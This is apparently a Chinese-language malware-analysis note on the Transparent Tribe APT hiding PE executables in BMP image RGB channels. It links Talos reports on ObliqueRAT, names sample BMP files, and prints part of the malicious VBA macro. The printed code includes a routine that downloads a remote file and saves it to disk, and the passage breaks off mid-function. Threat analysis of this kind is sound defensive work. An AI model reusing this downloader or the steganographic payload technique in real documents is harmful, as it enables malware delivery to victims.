透明部落通过BMP的RGB通道隐藏PE数据
-
- 报告和样本
-
- [《Transparent Tribe APT expands its Windows malware arsenal》](https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html)
- [《ObliqueRAT returns with new campaign using hijacked websites》](https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html)
- [《ObliqueRAT: New RAT hits victims' endpoints via malicious documents》](https://blog.talosintelligence.com/2020/02/obliquerat-hits-victims-via-maldocs.html)
- 样本
- 知识扩展图片隐写
报告和样本
《Transparent Tribe APT expands its Windows malware arsenal》
没什么技术分析,主要是描述战术和趋势
《ObliqueRAT returns with new campaign using hijacked websites》
有描述宏代码,以及RAT的更新
《ObliqueRAT: New RAT hits victims’ endpoints via malicious documents》
内容为ObliqueRAT分析,也可以看看
样本
theta.bmp
camela.bmp
merj.bmp
宏代码
DownloadBackground:下载图片
BackgroundStretch:读取BMP图片保存为xls
BackgroundSize:将字符串Letter(ASC)转为OrderByte(Byte)
'下载图片
Sub DownloadBackground(url As String, filePath As String)
Dim WinHttpReq As Object, attempts As Integer
attempts = 4
On Error GoTo TryAgain
TryAgain:
attempts = attempts - 1
Err.Clear
If attempts > 0 Then
Set WinHttpReq = CreateObject(\"Microsoft.XMLHTTP\")
WinHttpReq.Open \"GET\", url, False
WinHttpReq.send
If WinHttpReq.Status = 200 Then
Set Themeream = CreateObject(\"ADODB.Stream\")
Themeream.Open
Themeream.Type = 1
Themeream.Write WinHttpReq.responseBody
Themeream.SaveToFile filePath, 1
Themeream.Close
End If
End If
End Sub
'PE文件大小
Private Func